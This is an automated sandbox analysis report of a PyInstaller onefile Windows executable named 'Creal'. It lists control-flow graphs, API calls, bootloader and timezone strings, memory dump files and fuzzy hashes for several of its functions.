                                                                                                                                                                                                                                                        control_flow_graph 0 7ff6d92489e0-7ff6d9248b26 call 7ff6d924c850 call 7ff6d9249390 SetConsoleCtrlHandler GetStartupInfoW call 7ff6d92553f0 call 7ff6d925a47c call 7ff6d925871c call 7ff6d92553f0 call 7ff6d925a47c call 7ff6d925871c call 7ff6d92553f0 call 7ff6d925a47c call 7ff6d925871c GetCommandLineW CreateProcessW 23 7ff6d9248b4d-7ff6d9248b89 RegisterClassW 0->23 24 7ff6d9248b28-7ff6d9248b48 GetLastError call 7ff6d9242c50 0->24 26 7ff6d9248b8b GetLastError 23->26 27 7ff6d9248b91-7ff6d9248be5 CreateWindowExW 23->27 31 7ff6d9248e39-7ff6d9248e5f call 7ff6d924c550 24->31 26->27 29 7ff6d9248be7-7ff6d9248bed GetLastError 27->29 30 7ff6d9248bef-7ff6d9248bf4 ShowWindow 27->30 32 7ff6d9248bfa-7ff6d9248c0a WaitForSingleObject 29->32 30->32 34 7ff6d9248c0c 32->34 35 7ff6d9248c88-7ff6d9248c8f 32->35 39 7ff6d9248c10-7ff6d9248c13 34->39 36 7ff6d9248cd2-7ff6d9248cd9 35->36 37 7ff6d9248c91-7ff6d9248ca1 WaitForSingleObject 35->37 42 7ff6d9248cdf-7ff6d9248cf5 QueryPerformanceFrequency QueryPerformanceCounter 36->42 43 7ff6d9248dc0-7ff6d9248dd9 GetMessageW 36->43 40 7ff6d9248ca7-7ff6d9248cb7 TerminateProcess 37->40 41 7ff6d9248df8-7ff6d9248e02 37->41 44 7ff6d9248c1b-7ff6d9248c22 39->44 45 7ff6d9248c15 GetLastError 39->45 51 7ff6d9248cb9 GetLastError 40->51 52 7ff6d9248cbf-7ff6d9248ccd WaitForSingleObject 40->52 49 7ff6d9248e04-7ff6d9248e0a DestroyWindow 41->49 50 7ff6d9248e11-7ff6d9248e35 GetExitCodeProcess CloseHandle * 2 41->50 53 7ff6d9248d00-7ff6d9248d38 MsgWaitForMultipleObjects PeekMessageW 42->53 47 7ff6d9248ddb-7ff6d9248de9 TranslateMessage DispatchMessageW 43->47 48 7ff6d9248def-7ff6d9248df6 43->48 44->37 46 7ff6d9248c24-7ff6d9248c41 PeekMessageW 44->46 45->44 54 7ff6d9248c76-7ff6d9248c86 WaitForSingleObject 46->54 55 7ff6d9248c43-7ff6d9248c74 TranslateMessage DispatchMessageW PeekMessageW 46->55 47->48 48->41 48->43 49->50 50->31 51->52 52->41 56 7ff6d9248d3a 53->56 57 7ff6d9248d73-7ff6d9248d7a 53->57 54->35 54->39 55->54 55->55 58 7ff6d9248d40-7ff6d9248d71 TranslateMessage DispatchMessageW PeekMessageW 56->58 57->43 59 7ff6d9248d7c-7ff6d9248da5 QueryPerformanceCounter 57->59 58->57 58->58 59->53 60 7ff6d9248dab-7ff6d9248db2 59->60 60->41 61 7ff6d9248db4-7ff6d9248db8 60->61 61->43
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                        • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                        • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                        • Instruction ID: 3c67bba836a99225457eb9b277feedf950fe0e90b03fff68e5578b00ed1c1b9c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66D18232A29A8286FB109F74E9542AD3764FF98B58F400237DA5D83AA4DF3CD565CB40
                                                                                                                                                                                                                                                        Function 00007FF6D9241000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 62 7ff6d9241000-7ff6d9243806 call 7ff6d924fe18 call 7ff6d924fe20 call 7ff6d924c850 call 7ff6d92553f0 call 7ff6d9255484 call 7ff6d92436b0 76 7ff6d9243808-7ff6d924380f 62->76 77 7ff6d9243814-7ff6d9243836 call 7ff6d9241950 62->77 78 7ff6d9243c97-7ff6d9243cb2 call 7ff6d924c550 76->78 82 7ff6d924383c-7ff6d9243856 call 7ff6d9241c80 77->82 83 7ff6d924391b-7ff6d9243931 call 7ff6d92445c0 77->83 87 7ff6d924385b-7ff6d924389b call 7ff6d9248830 82->87 90 7ff6d924396a-7ff6d924397f call 7ff6d9242710 83->90 91 7ff6d9243933-7ff6d9243960 call 7ff6d9247f90 83->91 96 7ff6d924389d-7ff6d92438a3 87->96 97 7ff6d92438c1-7ff6d92438cc call 7ff6d9254f30 87->97 101 7ff6d9243c8f 90->101 99 7ff6d9243984-7ff6d92439a6 call 7ff6d9241c80 91->99 100 7ff6d9243962-7ff6d9243965 call 7ff6d925004c 91->100 102 7ff6d92438af-7ff6d92438bd call 7ff6d92489a0 96->102 103 7ff6d92438a5-7ff6d92438ad 96->103 109 7ff6d92439fc-7ff6d9243a2a call 7ff6d9248940 call 7ff6d92489a0 * 3 97->109 110 7ff6d92438d2-7ff6d92438e1 call 7ff6d9248830 97->110 115 7ff6d92439b0-7ff6d92439b9 99->115 100->90 101->78 102->97 103->102 138 7ff6d9243a2f-7ff6d9243a3e call 7ff6d9248830 109->138 119 7ff6d92438e7-7ff6d92438ed 110->119 120 7ff6d92439f4-7ff6d92439f7 call 7ff6d9254f30 110->120 115->115 118 7ff6d92439bb-7ff6d92439d8 call 7ff6d9241950 115->118 118->87 130 7ff6d92439de-7ff6d92439ef call 7ff6d9242710 118->130 124 7ff6d92438f0-7ff6d92438fc 119->124 120->109 127 7ff6d92438fe-7ff6d9243903 124->127 128 7ff6d9243905-7ff6d9243908 124->128 127->124 127->128 128->120 131 7ff6d924390e-7ff6d9243916 call 7ff6d9254f30 128->131 130->101 131->138 141 7ff6d9243b45-7ff6d9243b53 138->141 142 7ff6d9243a44-7ff6d9243a47 138->142 143 7ff6d9243b59-7ff6d9243b5d 141->143 144 7ff6d9243a67 141->144 142->141 145 7ff6d9243a4d-7ff6d9243a50 142->145 146 7ff6d9243a6b-7ff6d9243a90 call 7ff6d9254f30 143->146 144->146 147 7ff6d9243a56-7ff6d9243a5a 145->147 148 7ff6d9243b14-7ff6d9243b17 145->148 157 7ff6d9243aab-7ff6d9243ac0 146->157 158 7ff6d9243a92-7ff6d9243aa6 call 7ff6d9248940 146->158 147->148 152 7ff6d9243a60 147->152 149 7ff6d9243b19-7ff6d9243b1d 148->149 150 7ff6d9243b2f-7ff6d9243b40 call 7ff6d9242710 148->150 149->150 153 7ff6d9243b1f-7ff6d9243b2a 149->153 159 7ff6d9243c7f-7ff6d9243c87 150->159 152->144 153->146 161 7ff6d9243be8-7ff6d9243bfa call 7ff6d9248830 157->161 162 7ff6d9243ac6-7ff6d9243aca 157->162 158->157 159->101 170 7ff6d9243bfc-7ff6d9243c02 161->170 171 7ff6d9243c2e 161->171 164 7ff6d9243bcd-7ff6d9243be2 call 7ff6d9241940 162->164 165 7ff6d9243ad0-7ff6d9243ae8 call 7ff6d9255250 162->165 164->161 164->162 175 7ff6d9243aea-7ff6d9243b02 call 7ff6d9255250 165->175 176 7ff6d9243b62-7ff6d9243b7a call 7ff6d9255250 165->176 173 7ff6d9243c1e-7ff6d9243c2c 170->173 174 7ff6d9243c04-7ff6d9243c1c 170->174 177 7ff6d9243c31-7ff6d9243c40 call 7ff6d9254f30 171->177 173->177 174->177 175->164 188 7ff6d9243b08-7ff6d9243b0f 175->188 186 7ff6d9243b87-7ff6d9243b9f call 7ff6d9255250 176->186 187 7ff6d9243b7c-7ff6d9243b80 176->187 184 7ff6d9243c46-7ff6d9243c4a 177->184 185 7ff6d9243d41-7ff6d9243d63 call 7ff6d92444e0 177->185 189 7ff6d9243c50-7ff6d9243c5f call 7ff6d92490e0 184->189 190 7ff6d9243cd4-7ff6d9243ce6 call 7ff6d9248830 184->190 199 7ff6d9243d71-7ff6d9243d82 call 7ff6d9241c80 185->199 200 7ff6d9243d65-7ff6d9243d6f call 7ff6d9244630 185->200 201 7ff6d9243bac-7ff6d9243bc4 call 7ff6d9255250 186->201 202 7ff6d9243ba1-7ff6d9243ba5 186->202 187->186 188->164 204 7ff6d9243c61 189->204 205 7ff6d9243cb3-7ff6d9243cb6 call 7ff6d9248660 189->205 206 7ff6d9243ce8-7ff6d9243ceb 190->206 207 7ff6d9243d35-7ff6d9243d3c 190->207 214 7ff6d9243d87-7ff6d9243d96 199->214 200->214 201->164 216 7ff6d9243bc6 201->216 202->201 211 7ff6d9243c68 call 7ff6d9242710 204->211 221 7ff6d9243cbb-7ff6d9243cbd 205->221 206->207 212 7ff6d9243ced-7ff6d9243d10 call 7ff6d9241c80 206->212 207->211 224 7ff6d9243c6d-7ff6d9243c77 211->224 229 7ff6d9243d2b-7ff6d9243d33 call 7ff6d9254f30 212->229 230 7ff6d9243d12-7ff6d9243d26 call 7ff6d9242710 call 7ff6d9254f30 212->230 219 7ff6d9243d98-7ff6d9243d9f 214->219 220 7ff6d9243dc4-7ff6d9243dda call 7ff6d9249390 214->220 216->164 219->220 226 7ff6d9243da1-7ff6d9243da5 219->226 232 7ff6d9243de8-7ff6d9243e04 SetDllDirectoryW 220->232 233 7ff6d9243ddc 220->233 222 7ff6d9243cc8-7ff6d9243ccf 221->222 223 7ff6d9243cbf-7ff6d9243cc6 221->223 222->214 223->211 224->159 226->220 231 7ff6d9243da7-7ff6d9243dbe SetDllDirectoryW LoadLibraryExW 226->231 229->214 230->224 231->220 237 7ff6d9243e0a-7ff6d9243e19 call 7ff6d9248830 232->237 238 7ff6d9243f01-7ff6d9243f08 232->238 233->232 251 7ff6d9243e1b-7ff6d9243e21 237->251 252 7ff6d9243e32-7ff6d9243e3c call 7ff6d9254f30 237->252 242 7ff6d9244008-7ff6d9244010 238->242 243 7ff6d9243f0e-7ff6d9243f15 238->243 245 7ff6d9244035-7ff6d9244067 call 7ff6d92436a0 call 7ff6d9243360 call 7ff6d9243670 call 7ff6d9246fc0 call 7ff6d9246d70 242->245 246 7ff6d9244012-7ff6d924402f PostMessageW GetMessageW 242->246 243->242 244 7ff6d9243f1b-7ff6d9243f25 call 7ff6d92433c0 243->244 244->224 258 7ff6d9243f2b-7ff6d9243f3f call 7ff6d92490c0 244->258 246->245 255 7ff6d9243e2d-7ff6d9243e2f 251->255 256 7ff6d9243e23-7ff6d9243e2b 251->256 263 7ff6d9243ef2-7ff6d9243efc call 7ff6d9248940 252->263 264 7ff6d9243e42-7ff6d9243e48 252->264 255->252 256->255 269 7ff6d9243f41-7ff6d9243f5e PostMessageW GetMessageW 258->269 270 7ff6d9243f64-7ff6d9243fa0 call 7ff6d9248940 call 7ff6d92489e0 call 7ff6d9246fc0 call 7ff6d9246d70 call 7ff6d92488e0 258->270 263->238 264->263 268 7ff6d9243e4e-7ff6d9243e54 264->268 272 7ff6d9243e56-7ff6d9243e58 268->272 273 7ff6d9243e5f-7ff6d9243e61 268->273 269->270 306 7ff6d9243fa5-7ff6d9243fa7 270->306 274 7ff6d9243e67-7ff6d9243e83 call 7ff6d9246dc0 call 7ff6d9247340 272->274 275 7ff6d9243e5a 272->275 273->238 273->274 289 7ff6d9243e8e-7ff6d9243e95 274->289 290 7ff6d9243e85-7ff6d9243e8c 274->290 275->238 293 7ff6d9243e97-7ff6d9243ea4 call 7ff6d9246e00 289->293 294 7ff6d9243eaf-7ff6d9243eb9 call 7ff6d92471b0 289->294 292 7ff6d9243edb-7ff6d9243ef0 call 7ff6d9242a50 call 7ff6d9246fc0 call 7ff6d9246d70 290->292 292->238 293->294 308 7ff6d9243ea6-7ff6d9243ead 293->308 304 7ff6d9243ebb-7ff6d9243ec2 294->304 305 7ff6d9243ec4-7ff6d9243ed2 call 7ff6d92474f0 294->305 304->292 305->238 318 7ff6d9243ed4 305->318 310 7ff6d9243fa9-7ff6d9243fbf call 7ff6d9248ed0 call 7ff6d92488e0 306->310 311 7ff6d9243ff5-7ff6d9244003 call 7ff6d9241900 306->311 308->292 310->311 323 7ff6d9243fc1-7ff6d9243fd6 310->323 311->224 318->292 324 7ff6d9243fd8-7ff6d9243feb call 7ff6d9242710 call 7ff6d9241900 323->324 325 7ff6d9243ff0 call 7ff6d9242a50 323->325 324->224 325->311
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                        • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                                        • Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                                                        • Instruction ID: a6866806c9214bbae5c451787806f1a315c4708040ecb690f1ca90ee3d962c42
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E32AF21A2C68691FB19EF25DB543BD2661AF68780F444033DA5DC36D6DF2CE678CB40
                                                                                                                                                                                                                                                        Function 00007FF6D9265C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 479 7ff6d9265c00-7ff6d9265c3b call 7ff6d9265588 call 7ff6d9265590 call 7ff6d92655f8 486 7ff6d9265e65-7ff6d9265eb1 call 7ff6d925a900 call 7ff6d9265588 call 7ff6d9265590 call 7ff6d92655f8 479->486 487 7ff6d9265c41-7ff6d9265c4c call 7ff6d9265598 479->487 512 7ff6d9265eb7-7ff6d9265ec2 call 7ff6d9265598 486->512 513 7ff6d9265fef-7ff6d926605d call 7ff6d925a900 call 7ff6d9261578 486->513 487->486 492 7ff6d9265c52-7ff6d9265c5c 487->492 494 7ff6d9265c7e-7ff6d9265c82 492->494 495 7ff6d9265c5e-7ff6d9265c61 492->495 499 7ff6d9265c85-7ff6d9265c8d 494->499 497 7ff6d9265c64-7ff6d9265c6f 495->497 500 7ff6d9265c7a-7ff6d9265c7c 497->500 501 7ff6d9265c71-7ff6d9265c78 497->501 499->499 503 7ff6d9265c8f-7ff6d9265ca2 call 7ff6d925d5fc 499->503 500->494 504 7ff6d9265cab-7ff6d9265cb9 500->504 501->497 501->500 510 7ff6d9265cba-7ff6d9265cc6 call 7ff6d925a948 503->510 511 7ff6d9265ca4-7ff6d9265ca6 call 7ff6d925a948 503->511 520 7ff6d9265ccd-7ff6d9265cd5 510->520 511->504 512->513 522 7ff6d9265ec8-7ff6d9265ed3 call 7ff6d92655c8 512->522 533 7ff6d926606b-7ff6d926606e 513->533 534 7ff6d926605f-7ff6d9266066 513->534 520->520 523 7ff6d9265cd7-7ff6d9265ce8 call 7ff6d9260474 520->523 522->513 531 7ff6d9265ed9-7ff6d9265efc call 7ff6d925a948 GetTimeZoneInformation 522->531 523->486 532 7ff6d9265cee-7ff6d9265d44 call 7ff6d926a4d0 * 4 call 7ff6d9265b1c 523->532 549 7ff6d9265f02-7ff6d9265f23 531->549 550 7ff6d9265fc4-7ff6d9265fee call 7ff6d9265580 call 7ff6d9265570 call 7ff6d9265578 531->550 591 7ff6d9265d46-7ff6d9265d4a 532->591 535 7ff6d92660a5-7ff6d92660b8 call 7ff6d925d5fc 533->535 536 7ff6d9266070 533->536 539 7ff6d92660fb-7ff6d92660fe 534->539 553 7ff6d92660ba 535->553 554 7ff6d92660c3-7ff6d92660de call 7ff6d9261578 535->554 540 7ff6d9266073 536->540 539->540 541 7ff6d9266104-7ff6d926610c call 7ff6d9265c00 539->541 546 7ff6d9266078-7ff6d92660a4 call 7ff6d925a948 call 7ff6d924c550 540->546 547 7ff6d9266073 call 7ff6d9265e7c 540->547 541->546 547->546 555 7ff6d9265f25-7ff6d9265f2b 549->555 556 7ff6d9265f2e-7ff6d9265f35 549->556 562 7ff6d92660bc-7ff6d92660c1 call 7ff6d925a948 553->562 577 7ff6d92660e5-7ff6d92660f7 call 7ff6d925a948 554->577 578 7ff6d92660e0-7ff6d92660e3 554->578 555->556 563 7ff6d9265f37-7ff6d9265f3f 556->563 564 7ff6d9265f49 556->564 562->536 563->564 571 7ff6d9265f41-7ff6d9265f47 563->571 567 7ff6d9265f4b-7ff6d9265fbf call 7ff6d926a4d0 * 4 call 7ff6d9262b5c call 7ff6d9266114 * 2 564->567 567->550 571->567 577->539 578->562 593 7ff6d9265d4c 591->593 594 7ff6d9265d50-7ff6d9265d54 591->594 593->594 594->591 596 7ff6d9265d56-7ff6d9265d7b call 7ff6d9256b58 594->596 602 7ff6d9265d7e-7ff6d9265d82 596->602 604 7ff6d9265d84-7ff6d9265d8f 602->604 605 7ff6d9265d91-7ff6d9265d95 602->605 604->605 607 7ff6d9265d97-7ff6d9265d9b 604->607 605->602 610 7ff6d9265d9d-7ff6d9265dc5 call 7ff6d9256b58 607->610 611 7ff6d9265e1c-7ff6d9265e20 607->611 618 7ff6d9265dc7 610->618 619 7ff6d9265de3-7ff6d9265de7 610->619 612 7ff6d9265e27-7ff6d9265e34 611->612 613 7ff6d9265e22-7ff6d9265e24 611->613 616 7ff6d9265e36-7ff6d9265e4c call 7ff6d9265b1c 612->616 617 7ff6d9265e4f-7ff6d9265e5e call 7ff6d9265580 call 7ff6d9265570 612->617 613->612 616->617 617->486 623 7ff6d9265dca-7ff6d9265dd1 618->623 619->611 625 7ff6d9265de9-7ff6d9265e07 call 7ff6d9256b58 619->625 623->619 626 7ff6d9265dd3-7ff6d9265de1 623->626 631 7ff6d9265e13-7ff6d9265e1a 625->631 626->619 626->623 631->611 632 7ff6d9265e09-7ff6d9265e0d 631->632 632->611 633 7ff6d9265e0f 632->633 633->631
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265C45
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9265598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92655AC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: GetLastError.KERNEL32(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A968
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6D925A8DF,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925A909
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6D925A8DF,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925A92E
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265C34
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D92655F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D926560C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265EAA
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265EBB
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265ECC
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D926610C), ref: 00007FF6D9265EF3
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                        • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                        • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                                        • Instruction ID: dd93091ff2f17458dd622a58b75869cde8563797846a22ebf6205d689f5111da
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18D1E122A2824246FB24AF65DA419BD6761FF84794F448037EA4DC7BDADF3CE461C780
                                                                                                                                                                                                                                                        Function 00007FF6D9266964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 693 7ff6d9266964-7ff6d92669d7 call 7ff6d9266698 696 7ff6d92669d9-7ff6d92669e2 call 7ff6d9254ee8 693->696 697 7ff6d92669f1-7ff6d92669fb call 7ff6d9258520 693->697 702 7ff6d92669e5-7ff6d92669ec call 7ff6d9254f08 696->702 703 7ff6d92669fd-7ff6d9266a14 call 7ff6d9254ee8 call 7ff6d9254f08 697->703 704 7ff6d9266a16-7ff6d9266a7f CreateFileW 697->704 720 7ff6d9266d32-7ff6d9266d52 702->720 703->702 705 7ff6d9266afc-7ff6d9266b07 GetFileType 704->705 706 7ff6d9266a81-7ff6d9266a87 704->706 713 7ff6d9266b5a-7ff6d9266b61 705->713 714 7ff6d9266b09-7ff6d9266b44 GetLastError call 7ff6d9254e7c CloseHandle 705->714 710 7ff6d9266ac9-7ff6d9266af7 GetLastError call 7ff6d9254e7c 706->710 711 7ff6d9266a89-7ff6d9266a8d 706->711 710->702 711->710 718 7ff6d9266a8f-7ff6d9266ac7 CreateFileW 711->718 716 7ff6d9266b69-7ff6d9266b6c 713->716 717 7ff6d9266b63-7ff6d9266b67 713->717 714->702 728 7ff6d9266b4a-7ff6d9266b55 call 7ff6d9254f08 714->728 723 7ff6d9266b72-7ff6d9266bc7 call 7ff6d9258438 716->723 724 7ff6d9266b6e 716->724 717->723 718->705 718->710 732 7ff6d9266be6-7ff6d9266c17 call 7ff6d9266418 723->732 733 7ff6d9266bc9-7ff6d9266bd5 call 7ff6d92668a0 723->733 724->723 728->702 738 7ff6d9266c1d-7ff6d9266c5f 732->738 739 7ff6d9266c19-7ff6d9266c1b 732->739 733->732 740 7ff6d9266bd7 733->740 742 7ff6d9266c81-7ff6d9266c8c 738->742 743 7ff6d9266c61-7ff6d9266c65 738->743 741 7ff6d9266bd9-7ff6d9266be1 call 7ff6d925aac0 739->741 740->741 741->720 745 7ff6d9266c92-7ff6d9266c96 742->745 746 7ff6d9266d30 742->746 743->742 744 7ff6d9266c67-7ff6d9266c7c 743->744 744->742 745->746 748 7ff6d9266c9c-7ff6d9266ce1 CloseHandle CreateFileW 745->748 746->720 750 7ff6d9266d16-7ff6d9266d2b 748->750 751 7ff6d9266ce3-7ff6d9266d11 GetLastError call 7ff6d9254e7c call 7ff6d9258660 748->751 750->746 751->750
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                        • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
